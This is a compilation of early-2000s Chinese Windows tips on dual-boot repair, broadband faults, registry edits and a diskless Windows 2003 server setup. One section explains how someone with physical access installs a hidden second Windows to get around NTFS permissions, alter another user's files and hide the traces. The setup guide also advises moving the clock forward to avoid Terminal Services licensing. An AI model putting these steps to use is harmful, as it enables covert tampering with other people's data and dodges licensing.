    同时体验两个Windows操作系统的魅力，采用Windows Me与Windows XP双重引导，是很多用户的选择。但是，由于种种原因，很多时候你可能要重装Windows Me。而这一重装不要紧，之后你会发现用于双引导的启动选择菜单不见了(这种情况见于在DOS下重装Windows 9x、特别是格式化C盘后的重装)！那么，Windows XP到底上哪儿去了呢？

    和平共处有顺序

    一般而言，在安装双系统的时候，我们是先安装Windows Me，然后在另一个分区安装Windows XP。
安装了Windows Me之后，C盘引导区储存的是Windows Me的引导信息，开机后系统通过加载系统文件Io.sys和Command.com来引导Windows Me。
    安装Windows XP之后，C盘引导区被Windows XP的引导信息所覆盖，用来启动Windows Me的引导信息被移到引导区以外，储存在一个名为Bootsect.dos的文件中。
    实现双引导后，系统通过加载Windows XP的系统文件Ntldr来读取Boot.ini，查找其他操作系统，并显示启动选择菜单，让用户确定启动哪个系统：如果选择启动Windows Me，则通过Bootsect.dos来加载Io.sys和Command.com系统文件来引导Windows Me；如果选择启动Windows XP，则直接加载Ntldr、通过Nntdetect.com系统文件来引导Windows XP。

    不同分区是前提

    而一旦再次安装Windows Me时，C盘的引导区再次变成Windows Me的引导信息，即使Ntldr和Boot.ini两个文件仍存在，开机时系统也不再加载它们，因此不会出现启动选择菜单；如果格式化了C盘，这两个文件将不复存在，就更不会出现启动选择菜单了。
    其实，大多数用户的Windows Me与Windows XP并没有安装在同一个分区，虽经格式化C盘、重装Windows Me，变化的仅仅是C盘的引导区、选择引导不同系统的系统文件，以及C盘上的Windows Me的安装文件和设置信息。也就是说，保存在其他分区中的Windows XP安装文件、设置信息并没有被破坏，因此，无需费时费力地重新安装和设置Windows XP，只要恢复一下C盘的引导区和选择引导系统的系统文件，就可以快速恢复Windows Me与Windows XP的双重引导，找回原来的Windows XP！

    拨开迷雾见真谛

    恢复Windows Me和Windows XP双重引导的方法是：
    1、启动Windows Me后，执行Windows XP的安装程序。
    2、按照正常的安装过程，在安装第一步“安装选项”中选择“全新安装(高级)”。
    3、输入安装密码，跳过“升级驱动器”(不选“升级为NTFS文件系统”)和“下载更新的安装程序文件”两步。
    4、系统开始复制安装文件，等绿色的复制进度条到头后，出现“重新启动计算机”的红色进度条，此时，迅速按下“Esc”键，禁止重新启动(成功禁止重新启动则直接进入第7步)。
    5、如果没有及时按下“Esc”键而导致系统重新启动，将会出现启动选择菜单，其中包括三个启动选项(格式化C盘后重装，则只出现后两项)：
    Microsoft Windows XP Professional
    Microsoft Windows Millennium Edition
    Microsoft Windows XP Professional安装程序
    6、按小键盘区的方向键，在5秒钟内选择“Microsoft Windows Millennium Edition”启动Windows Me。
    7、进入C盘即可看到，根目录上已经出现了实现双引导启动需要的五个文件：“Ntldr”、“Ntdetect.com”、“Boot.ini”、“Bootfont.bin”、“Bootsect.dos”。
    此外还有Windows XP的三个安装文件“ldr”、“drvltr.~_~”、“txtse-tup.sif”和一个文件夹“win_nt.~bt”，其他分区也各有一个磁盘加速文件“DRVLTR.~_~”，直接删除即可。
    8、修改Boot.ini文件。在[Boot Loader]段中：将“Default=C:＼WIN_NT.~BT＼BOOTSECT.DAT”一行改为“Default=C:＼”，如果不从启动选择菜单中进行选择，默认从C盘引导启动Windows Me；或改为“Default=multi(0)disk(0)rdisk(0)partition(2)＼WINDOWS”，使系统默认从D盘引导启动Windows XP(如果Windows XP安装在E盘，将“partition(2)”中的“2”改为“3”、以此类推)。
    同时，还可在[Boot Loader]段中设定启动选择菜单维持的时间(以秒为单位)，将“Timeout=5”中的“5”改为你希望的时间即可。
    在[Operating Systems]段中，删除“C:＼WIN_NT.~BT＼BOOTSECT.DAT="Microsoft Windows XP Professional安装程序"”一行，即可将Windows XP的安装选项从启动选择菜单中屏蔽掉。若是格式化C盘后重装Windows Me，还需加入“multi(0)disk(0)rdisk(0)partition(2)＼WINDOWS="Microsoft Windows XP Professional"/fastdetect”一行，使系统以快速启动的方式从D盘引导Windows XP。同时，还可以在[Operating Systems]段中修改启动选择菜单显示的文字，比如：将“Microsoft Windows XP Professional”改为“Windows XP中文版”、“Microsoft Windows Millennium Edition”改为“Windows Me千禧版”，之后，选择引导菜单上显示的就是“Windows XP中文版”和“Windows Me千禧版”了。
    9、重新启动就恢复双重引导了，并且，Windows XP的全部设置百分之百保持原来的状态，与重装Windows Me前没有丝毫改变。

    四、修复双系统启动菜单
    如果安装了了双操作系统的朋友就会知道，一般双系统都会是98/me加上2000/xp这样类型的操作系统，在安装操作系统的时候xp/2000会自动建立起一个双重系统启动菜单，双重系统的启动是因为在c盘的根目录下面含有这样几个文件：win.ini boot.ini bootfont.bin ntdetect.com ntldr io.sys msdos.sys 后面这两个是要在文件夹选项里面更改（隐藏受保护的系统文件）才能看到的。最好在其中的一个系统坏了以后先备份这几个文件，如果没有备份就先把c盘格式化了，并且安装好了98/me的话是不是感到没有办法了恢复了呢？这里介绍一种简单的方法：
    先把xp/或者2000的安装光盘放入光驱，并且执行setup安装xp/2000，选择全新安装。安装程序就会继续安装，等待重启以后不要继续安装了，直接进入me/98，观察c盘根目录，多了几个文件夹，还有一些看不懂的文件。但是更改了文件夹选项里面的（隐藏受保护的系统文件）以后发现win.ini boot.ini bootfont.bin ntdetect.com ntldr io.sys msdos.sys都恢复了，那么你可以直接删除其他你看不懂的文件名很奇怪的文件夹了，因为那是为windows xp/2000安装准备的安装文件,然后打开并这样编辑boot.ini

    [boot loader]
    timeout=10
    default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
    [operating systems]
    multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="①: Windows XP/2000 " /fastdetect
    C:\=②: Windows ME/98

    然后重新系统启动就可以了 发现双启动菜单已经恢复了。

    五、双操作系统共存常见问题解答
    双系统的安装顺序

    问：我打算在一台电脑中安装多系统(Windows 9x/XP)，请问在安装的先后顺序上有什么讲究么？应该注意哪些地方？

    答：一般来说，安装顺序是先低级版本到高级版本的，也就是说首先安装Windows9x，然后在Windows9x系统下安装WindowsXP，这样做的好处是系统可以自动生成开机选择画面。

    要注意的有以下几点：

    1、要把每个系统安装在不同的分区中。最好的安排是：把Windows 9x安装在C盘上，Windows XP安装在D盘上。

    2、针对不同的系统要选择不同的系统文件格式。对于Windows9x，要选择FAT16或FAT32的；而对于Windows XP，最好使用NTFS格式，这样系统潜力会发挥的更好。

    3、在Windows9x上安装Windows XP时要选择“全新安装”，不要选择“升级安装”。

    高版本如何安装低版本

    问：我的系统是Windows XP，现在我想再安装一个Windows 98，请问如何在保留Windows XP的情况下安装Windows 98，做个双系统？

    答：因为Windows XP下不能直接安装Windows 98，所以必须首先用Windows 98启动盘启动电脑(当然前提是在CMOS中设置先从A盘启动)，然后把Windows98安装到WindowsXP以外的分区中。重启系统后，你会发现并没有双启动菜单，系统直接进入了Windows 98。不要紧，按照下一个问题的解答恢复即可。恢复完后把硬盘各分区中以“”字符打头并以“”结尾的文件删除就可以了。

    恢复选择菜单

    问：我安装的是Windows 98加Windows 2000操作系统，由于误操作把boot.ini文件删除了，现在启动电脑时就会出现“boot.ini非法”提示，也没有选择菜单了，而是直接进入了Windows 2000，请问该如何恢复？

    答：首先在BIOS中将启动顺序调整为CD-ROM引导，然后将Windows 2000安装盘放入光驱。等自动加载完安装程序后，系统会问你是重新安装还是修复，不用管它，直接退出。最后到CMOS中把启动顺序再改为硬盘启动，这样再次开机后就会出现选择菜单了。

    删除其中一个系统

    问：请问在双系统中(Windows9x和Windows XP)，如何在不损害一个系统的情况下删除另外一个系统？

    答：如果想删除Windows9x的话，可以在Windows XP中右键单击“我的电脑”，选择“属性→高级”，点击“启动和故障恢复”中的“设置”按钮，然后把启动时间改为“0”，这样在启动时就会直接进入Windows XP，而不会在出现选择菜单了。最后把Windows 9x的Windows、Program Files目录和引导文件(包括io.sys、msdos.sys、command.com、autoexec.bat和config.sys)删除即可。
    如果想删除Windows XP，首先在Windows 9x环境下把Windows XP所在的目录全部删除，然后用一张Windows 9x的启动盘(根据操作系统所定)启动，在“A:”下输入“SYS C:”，给Windows9x所在的C盘重新传系统即可。

     如何访问NTFS分区

    问：我的电脑是Windows 98、Windows 2000的双系统，Windows 2000所在的分区使用了NTFS文件格式，这样我在Windows 98下就不能访问它们了，请问如何在不转化为FAT格式的情况下访问它们呢？

    答：目前没有太好的办法，只能使用软件NTFS for Windows 98，它是专为Windows 9x系统访问NTFS分区而设计的，使用它可以在Windows 9x环境下对NTFS分区进行读写等操作。


睡眠”不醒的罪魁祸首

《一键清理系统垃圾》

睡眠”不醒的罪魁祸首

    使用了多年K6Ⅱ 300的爱机在我数次心理“斗争”下终于下定决心让它退休。驱“猫”上网，找报价查资料并拿出几乎全年的《中国电脑教育报》一番折腾后，精心DIY了一台新机配置。不出几日，所有的电脑配件全部一件不少地通过客车送送来了。经过细心的硬、软件安装，一台崭新的电脑(赛扬1.7GHz、256MB DDR内存、金钻60GB、i845G主板)终于摆在了我的案前。经过十多天的使用后，发现了一个问题：每次Windows XP正常待机后在不切断计算机电源的情况下，不论是机箱电源开关还是键盘开机却很少能够“唤醒”。平均十次也就能成功两三次吧。

    我在BIOS的电源管理中的暂停模式设为 S3 STR模式，即内存休眠模式。经过很多努力查找故障原因也未能解决，后来一直认为是主板BIOS的版本故障，只好等到新版BIOS出来再说了。前几天，偶然得到一款LG108键盘，于是将整机惟一未换、沿用至今的老式IBM101 PS2键盘换掉。进入BIOS将键盘开机热键由Ctrl+F1改为Power键。使用几天后，突然发现故障消失，恍然大悟才发现全是键盘惹的祸。不知你是否也因使用老式键盘有同样的故障，换换吧!

    七伤人提示：由于目前操作系统各项功能越来越丰富，因此有可能会与一些老的硬件设备产生冲突；特别是一些不太起眼的小东西更需要我们注意。比如本例中的键盘，应该是属于不符合PC99硬件规范的键盘，在主板休眠后，不能与5VSTB电源很好配合，因此不能够总是激活系统


透彻观察宽带故障

《一键清理系统垃圾》

透彻观察宽带故障

    宽带的普及已经极大地改变了我们的网络生活，使其变得更加丰富多彩。但随之而来的各种故障和问题也使许多初次接触宽带的网友变得一筹莫展。宽带网的故障与以前的普通Modem上网故障有着很大的不同，本文就以笔者所在的城市上海为例来具体说明各种常见的故障。

    线路故障

    这是所有宽带故障中最难解决的问题了，这类故障都有着非常大的隐蔽性，线路的故障会产生很多情况，轻则上网速度变慢或者速度不稳定，重则不能上网。
    一、ADSL

    由于ADSL是架设在原来的电话线上，所以它的通信质量就取决于你家的电话线了。对于那些新建的小区或者是电话线在近期进行过改造的地区发生线路故障的可能性就很小，而那些仍在使用旧电话线的地区产生线路故障的可能性就很大了。检测电话线质量有个很方便的方法，那就是拿起你家的电话，仔细听拨号音，听听声音是否纯净没有杂音，如果拨号音非常纯净，那就说明你家的电话线质量很好，反之就说明电话线质量不好了，如怀疑是电话线质量问题，可以让电信局来帮助查找问题。

    在排除了线路问题后就应该查查你的ADSL Modem是不是安装在电话线的进口上，千万要注意电话只能接在ADSL滤波分离器的电话信号输出线上，不能和ADSL设备并联。还应该检测一下你家里的电话线是否有损坏，如有的话应该将其换成新的电话线。

    由于ADSL技术对电话线路的质量要求较高，目前采用的ADSL是一种RADSL即速率自适应ADSL，如果电话局到用户间的电话线路在某段时间受到外在因素干扰，RADSL会根据线路质量的优劣和传输距离的远近，动态地调整用户的访问速度。

    所以，在安装之前你还应该注意你家离最近的电信局有多远，如果是较远的话，你的ADSL肯定会有很多问题，所以ADSL最适合市区的用户安装。

    二、Cable Modem

    Cable Modem（线缆调制解调器）发生线路故障的可能性相对来说就要低一些，因为有线电视网络公司在安装有线通的时候，一般都会重新从楼道中接一个新的的端口到你家，这样就可以和原有的有线电视的线路分开了，最大限度降低了发生线路故障的可能性。另外有线电视网络公司的安装人员一般都会在线路安装好后使用专业的信号测试仪器对新装线路进行检测，以确定信号强度达到要求。但是，也不是说有线通就没发生线路故障的可能，这主要集中在那些将Cable Modem移到别的地方使用的情况下，如果碰到这类情况只能付点钱让有线电视网络公司帮你新安装一个端口了。

    三、FTTB

    由于长城FTTB（Fiber To The Building，光纤到楼）所使用的线路都是近两年才铺设的，所以它发生线路故障的几率更低一些。如果发生了线路故障的话，对于用户来说应该先排除自身的原因后，再去报修。

    接入设备故障

    接入设备也就是我们常说的Modem、网卡，有线通和ADSL都需要Modem，长城FTTB通过网卡接入。

    一、Modem

    1、Modem的选择

    在宽带刚刚开始可以安装的时候，接入商一般都是直接提供那些原装进口的名牌Modem，那个时候安装的很多用户都为能用上这类名牌Modem感到高兴。可是经过长时间的使用后，有越来越多的用户发现这些进口设备并没有想像中的那么优秀，并且还经常发生无法上网的故障，而这时那些国产的宽带Modem出现在了市场上，这些国产设备都是根据国内的实际情况进行设计生产的。国产Modem不仅使得宽带接入费用大幅度降低，而且在经过广大用户使用后发觉，它们的性能不仅不比进口设备差，而且在很多时候还要优于进口Modem。所以我在这就提醒一下近期准备安装宽带的朋友注意，由于现在在安装宽带的时候，Modem一般都是用接入商提供的，而接入商提供的设备会随着时间的不同而不同，有的时候会是国产设备，有的时候又会是进口设备，所以大家在可能的情况下应该尽量要求接入商提供国产的设备。

    2、Modem的保养

    许多宽带用户，特别是有线通的用户都有着长开Modem的习惯，并还为这在论坛上进行过激烈的讨论。依笔者的看法，如果你不是24小时上网的的话，最好在晚上睡觉之前将Modem关闭，这样对于设备的寿命是有着很大好处的，特别是对于现在越来越热的天气，让Modem休息一下还是很有必要的。当然，如果你是属于24小时上网的那就没必要关了。

    宽带运营商一般都会对自己提供的接入设备提供较长时间的维修服务，所以在设备损坏的时候应该尽快保修，千万不要自己尝试修理。

    二、网卡

    这三种宽带接入方式一般都是需要网卡接入的，除非你使用的是内置式或者USB的Modem。网卡的故障有很多，在这里不可能说清楚，笔者只根据一些宽带的特殊情况来加以介绍。宽带接入商一般都会有偿提供网卡的，但许多用户由于感觉接入商提供的网卡不仅价格高而且性能低，所以也就自己去购买网卡并安装。但这里我要提醒一下大家，在选购网卡时要一定要选择那些使用比较普遍的网卡品牌，一般来说这些网卡的兼容性还是很不错的。

    如果发生网卡驱动无法安装或者频繁死机等故障，可以尝试将网卡换一个插槽，或者在安装其他设备的驱动之前首先安装网卡的驱动。另外，许多10/100M自适应网卡在用于宽带接入的时候会出现传输速度不稳定等情况，如果你碰到这类问题时，可以尝试将你的网卡强制工作于10M模式下。

    软件故障

    如果你发生了网络故障后，在排除了我上面所说的所有故障后就基本可以认定是软件故障了。首先，你应该先查一下你的电脑里是否有病毒或者黑客软件等。对于ADSL来说，故障发生情况最多的一般都是无法拨号。许多用户喜欢使用那些从网上下载回来的第三方拨号软件，但是有时候容易发生问题。当遇到这种情况时，可以换用电信提供的拨号软件，虽然电信提供的软件不一定是最好的，但起码兼容性是要好一些。对于有线通来说一般只要直接使用系统默认的设置就可以了，而对于FTTB来说由于每个小区的服务器IP地址不同，所以设置也就不同了，但是设置步骤还是相同的，只要严格根据接入商提供的操作手册进行设置就可以了。如果还是不行的话就应该询问你的接入商这些参数有没有改变过，如果改变过的话就应该按照改变后的参数进行设置。


突破NTFS读写权限

《一键清理系统垃圾》

突破NTFS读写权限

    本机装着Windows2000，因工作关系将重要资料放于C:\studio\，（C盘为NTFS格式）并设置了如下权限：

    Lostar（就是我啦）完全控制

    Everyone只读

    后有一天，发现其中文件被人改动，大惊，接着一连几天文件都与我的记忆有出入。对了，忘了介绍一下我的机子的情况：

    机子在办公室，大家任意玩，只是他们都只是Guests，也就是说，真正意义上的用户只有我一个。

    而这个情况的出现，说明：系统被人完全控制了！

    可是，到底怎么了呢？所有的人都是Guests呀，连User都没有。难道是用的什么读写NTFS的黑客软件，那么我的那些重要资料不是暴露于别人的键盘之下？

    只能向恶势力低头吗？HoHo，没门。我决定斗争到底，哪怕英勇牺牲。

    在漫无目的检查中，我发现D:\backup\sys\windows\下竟然隐藏着另一个Windows2000，在确定不是我备份的后，我晕倒了两次。

    看着这个Windows2000，一个能读写NTFS的黑客软件出现在我的眼前。

    我总结出一个笨但是很有用的方法来突破NTFS的读写权限，但有3个前提：物理接触主机、有权开机时修改CMOS、硬盘够大。

    方法很卑鄙，卑鄙的令人发毛：用Windows2000光盘启动，重装一个Windows2000到隐蔽的目录下，在新Windows2000中改管理员名与旧Windows2000相同，密码当然自己设咯。然后你就可以对禁地中的文件为所欲为了。

    修改过那些文件后，来到“系统特性”（也就是“我的电脑”->属性），选择“启动和故障恢复(S)...”->“默认操作系统”为第二个Windows2000（启动时会有两个相同的Windows2000启动方式给你选，一般都是第一个是新装的，如果出现这个选择不就露馅了？）所以我们去掉“显示操作系统列表”复选框。重启，OK！让管理员去奇怪吧。

    后记：我们自己怎么回到我们的基地呢？该不会每次都重装吧？在启动时大按F8，选择回主菜单，不就是由看见那张列表了吗？

    怎么样，做一个幽灵吧？篡改真正管理员的文件吧？哈哈。被逮住了可别怪我。


为文件夹添加背景音乐

《一键清理系统垃圾》

为文件夹添加背景音乐

操作依次为，在文件夹空白处单击鼠标右键→自定义文件夹→选择‘创建或编辑HTML文档’，单击下一步，系统会自动弹出用记事本打开的Folder.htt文件，在文件中找到＜body scroll=no onload="Init()"＞这段代码，在下面加入：

＜bgsound src="file://F:\音乐天地\水木年华\一生有你.wav" loop=1＞

注释：“loop=1”代表播放一次，-1代表循环播放。

接下来就是保存文件，退出编辑状态。在该文件下按F5刷新，就可以听到自己喜欢的音乐了。

注意事项：我们在选择背景音乐的时候要用WAV文件格式，如果使用MP3文件，也必须先用软件将MP3格式转换成WAV格式后才能使用。而这样的软件很多，操作也很简单，在这里就不再多说了。


我的电脑内不可改名的方法

《一键清理系统垃圾》

我的电脑内不可改名的方法

修改例如：控制面板，一类的名称不可以直接修改，可以从注册表修改
在注册表下的
[HKEY_CLASSES_ROOT\CLSID]
目录下有这些文件，下面是一些参数，由于我的电脑是XP优化界面，需要文件支持
请安装系统图标文件。
REGEDIT4

[HKEY_CLASSES_ROOT\CLSID]
@=""

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}]
@="控制面板"
"InfoTip"="使用“控制面板”个性化您的计算机。例如，您可以指定桌面的显示(“显示”图标)、事件的声音(“声音”图标)、音频音量的大小(“多媒体”图标)和其它内容。"

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\DefaultIcon]
@="C:\\WINDOWS\\SYSTEM\\shell32.dll,-137"

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\InProcServer32]
@="shell32.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\shellex]

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\shellex\ExtShellFolderViews]

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\shellex\ExtShellFolderViews\{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
"PersistMoniker"=hex(2):66,69,6c,65,3a,2f,2f,43,3a,5c,57,49,4e,44,4f,57,53,5c,\
  77,65,62,5c,63,6f,6e,74,72,6f,6c,70,2e,68,74,74,00

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}]
@="打印机"
"InfoTip"="使用打印机文件夹添加并安装本地或网络打印机，或更改现有打印机的设置。"

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\DefaultIcon]
@="C:\\WINDOWS\\SYSTEM\\shell32.dll,-138"

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\InProcServer32]
@="shell32.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\shellex]

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\shellex\ExtShellFolderViews]

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\shellex\ExtShellFolderViews\{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
"PersistMoniker"=hex(2):66,69,6c,65,3a,2f,2f,43,3a,5c,57,49,4e,44,4f,57,53,5c,\
  77,65,62,5c,70,72,69,6e,74,65,72,73,2e,68,74,74,00

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}]
@="计划任务"
"InfoTip"="这是调度程序的计划任务工具，它能让电脑按照预定的时间任务
有规律地运行一些程序"

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\DefaultIcon]
@="C:\\WINDOWS\\SYSTEM\\\\Win2000.icl,25"

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\InProcServer32]
@="C:\\WINDOWS\\SYSTEM\\mstask.dll"
"ThreadingModel"="Both"

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\ShellFolder]
"Attributes"=hex:00,00,00,21

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\shellex]
@=""

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\shellex\ExtShellFolderViews]

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\shellex\ExtShellFolderViews\{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
"PersistMoniker"="file://C:\\WINDOWS\\web\\schedule.htt"

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\shellex\PropertySheetHandlers]
@=""

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\shellex\PropertySheetHandlers\{1F2E5C40-9550-11CE-99D2-00AA006E086C}]
@=""

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}]
@="拨号网络"
"InfoTip"="使用“拨号网络”访问其它计算机上的共享信息，即使您的计算机不在该网络中。必须将要拨入的计算机设置为网络服务器，才能使用它的共享资源。"

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\InProcServer32]
@="rnaui.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\DefaultIcon]
@="C:\\WINDOWS\\SYSTEM\\rnaui.dll,0"

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\ShellFolder]
"Attributes"=hex:04,00,00,20

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\shellex]

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\shellex\ExtShellFolderViews]

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\shellex\ExtShellFolderViews\{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
"PersistMoniker"="file://C:\\WINDOWS\\web\\dialup.htt"

[HKEY_CLASSES_ROOT\CLSID\{BDEADF00-C265-11d0-BCED-00A0C90AB50F}]
@="Web 文件夹"
"InfoTip"="您可以创建快捷方式，使它们指向您公司 Intranet 或万维网上的 Web 文件夹。要将文档发布到 Web 文件夹中或要管理文件夹中的文件，请单击该文件夹的快捷方式。"

[HKEY_CLASSES_ROOT\CLSID\{BDEADF00-C265-11d0-BCED-00A0C90AB50F}\InProcServer32]
@="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\Web 文件夹\\MSONSEXT.DLL"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{BDEADF00-C265-11d0-BCED-00A0C90AB50F}\DefaultIcon]
@="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\Web 文件夹\\MSONSEXT.DLL,0"

[HKEY_CLASSES_ROOT\CLSID\{BDEADF00-C265-11d0-BCED-00A0C90AB50F}\ShellFolder]
"Attributes"=dword:a8400000


无盘Windows 2003安装指南

《一键清理系统垃圾》

无盘Windows 2003安装指南

    准备：

    软件:无盘通标准版以上版本，安装过程中所需要的程序在标准版以上光盘的2003目录中。用户自备应用软件和Windows2003标准版或企业版。

    硬件(注意：以下配置为最低配置，根据应用环境适当调整)

    20台工作站，运行OFFICE的配置。注：工作站256色，没有声音！

    CPU ： P4 1400MHZ 大致计算公式： CPU>500MHZ+45*工作站台数
    内存： 512 M 内存公式为：标准配置RAM=20M*工作站台数+128M
    硬盘： 40G 最好支持ATA100、7200转、2M以上缓存 3年质保！！
    光驱： 40X 显卡： AGP （TNT2）2003自带驱动程序（稳定性考虑）
    网卡： TX530 PCI接口网卡一块（8029、TX530）
    可选配上网设备（至少配备ISDN ）

    工作站:

    CPU ： 486 66MHZ以上 显存1M以上 （建议用奔腾系列 16M内存 ）
    内存 ： EDO 8M
    网卡：UM9008、RTL8019、RTL8029、RTL8139直接可用。其它各种类型要备用驱动磁盘，网卡芯片为NT RPL芯片
    注意：各网卡有各自启动芯片！

    注意服务器网卡要用PCI的,因为PCI的都支持PNP,装好2003后,Windows2003会自动安装网卡程序,一般不必多余设置。

  安装：

    首先用Win98启动光碟从光碟启动，将硬盘主分区分为FAT32分区,一般取4G以上就可以了,主要能备份Win2003就行，并激活。其它空间不需分区，重启并格式化。然后将Win2003光盘的I386拷入硬盘，注意加载磁盘缓冲(SMARTDRV.EXE)。不然拷贝文件速度很慢。启动安装程序(注意：在DOS下运行WinNT，不是SETUP)，进入Windows2003的安装，在安装过程中安装程序要求分区，注意安装Windows2003系统软件的分区（系统一般装到D：注意不要安装在C：因为C：为FAT32格式，不能设权限）要用NTFS格式化，一定注意要选用NTFS格式化，因为只有NTFS格式化才能设本地权限。（一般40G硬盘这样分区C：4000M FAT32 启动分区 D：6000M NTFS 系统分区 E：10G以上 NTFS 用户分区）按照提示安装好Windows2003。服务器名字用SERVER，这样会少很多麻烦，因为我的程序是用SERVER名字设置的。安装完成后，第一次启动，我们可以看到管理您的服务器的界面，这时，我们就可完成了服务器的系统的安装！这里要说的是，我们可以在管理您的服务器的界面中查看当前安装的服务角色，要注意的是，我们不需要的服务都不要去安装，要尽可能地少安装服务，比如，域控制器（Active Directory）、IIS、POP3等都不要安装，总之整个服务器安装完后，我们只安装以下的几个必需要的服务，文件服务器、终端服务器、DHCP服务器。服务器安装好后，在管理您的服务器中，如果你的服务超过这些，而您又没有其它程序需要多余的服务的话，就将其它服务删除吧！这样的话，才可能使服务器运行速度正常，不然的话，可能会很慢！

    2. 服务器的设置。

    安装服务器后。就可以重新分区，用右键点我的电脑，进入管理工具，进入磁盘管理，然后建立分区，E：，F：...格式化进入光盘中的2003目录中，安装一个WinRAR，（根目录）因为的软件都是用它压缩的。将我的光盘中的程序全部解压,解压到硬盘。（需要用到的程序都在2003目录）接下来马上装的远程启动服务。由于2003取消了NETBEUI和DLC协议，所以我们必需手动添加这些协议，不然，我们的RPL就不可能运行。要添加这此协议，我们必需拷贝添加这些协议的文件，我们的光盘中有这样一个压缩文件,名字为RPLSP,解压后有很多子目录,它们是Drivers下面的DLC.SYS和NBF.SYS我们只需要进入Drivers目录,复制这两个文件到系统的Windows目录的SYSTEM32目录的Drivers中.然后将INF目录下的文件,拷贝到Windows目录的INF目录中.还有SYSTEM32目录中的文件,复制到Windows目录下的SYSTEM32中,全部覆盖就可以了!注意，SYSTEM32目录中的文件，是不能直接拷贝覆盖的，直接覆盖会提示文件正在使用。只有重启计算机，在启动时按F8，选择带命令提示符的安全模式，进入命令提示符方式，用COPY命令拷到Windows的SYSTEM32目录覆盖！拷贝以上文件后，就可以添加DLC和NETBEUI协议了，当然，就可以安装远程启动服务了！添加DLC服务时，如果提示调用过程失败，不能添加的话，请重启一个服务器，一般就可以添加上了！

因为Win2003本身没有远程启动。所以必需安装光盘中的有一个程序RPLW2K，它的目地是为Win2003添加远程启动服务。安装了协议后就可以运行它了，一般RPL装在D：\RPL目录,装好启动服务后一般重新启动就能行了。然后在控制面版里的服务选项，将远程启动服务先停止，然后将光盘2003目录的RPL文件解压拷入所装远程启动的目录D:\RPL。覆盖所有文件。然后重启动远程服务。（当然，有时会启不动服务。多装几次就行了。还不能启动的话，注意拷贝的文件大小，比较一下，看Windows是不是自动更改过了，如果不清楚，就再拷贝覆盖一次吧！）从所安装的目录D:\RPL将近快捷方式拉出就行了，当然，建议你将近远程启动装到D：\RPL.装在其它目当也行.总之一定要保证远程启动服务运行正常,工作站能远程启动DOS。我的RPL目当已经添加了网卡号和DOS系统,只要覆盖D:\RPL目录后就不必添加卡号了,工作站只要连上服务器就可以启动到DOS了.只限网卡KE-2008,KE-2009,RTL8029,RTL8139.卡号为KE-2008.000021,KE2009.52544C

    如果用其它网卡类型不一样,要自已添加卡号，请参考NT40的无盘DOS篇。

    安装好远程启动服务后，我们就可以安装DHCP服务了，因为Windows 2003需要用到TCP/IP协议，所以我们要安装DHCP让服务器自动为工作站提供IP地址，需要注意的是，我们的服务器地址需要指定为192.168.0.1。

    然后就可以安装终端服务了。安装终端服务时要注意时间要提前一些，比如调为2010年，等安装完服务器后才调正确，因为这样可以不用安装终端授权。从管理您的服务器中安装。选添加删除角色,自定义配置，终端服务器，选取安装终端服务器就可以了，重启计算机后，就可以看到终端服务装好了。五笔字型可以用office2000中的86版。安装好终端服务后可以测试一下能否正常使用，进入光盘的2003目录将Win32目录拷入D：运行MSTSC.EXE输入服务器名点连接，如果出现输入用户名界面就表示终端服务安装完成。

    3. MetaFrame XP的安装

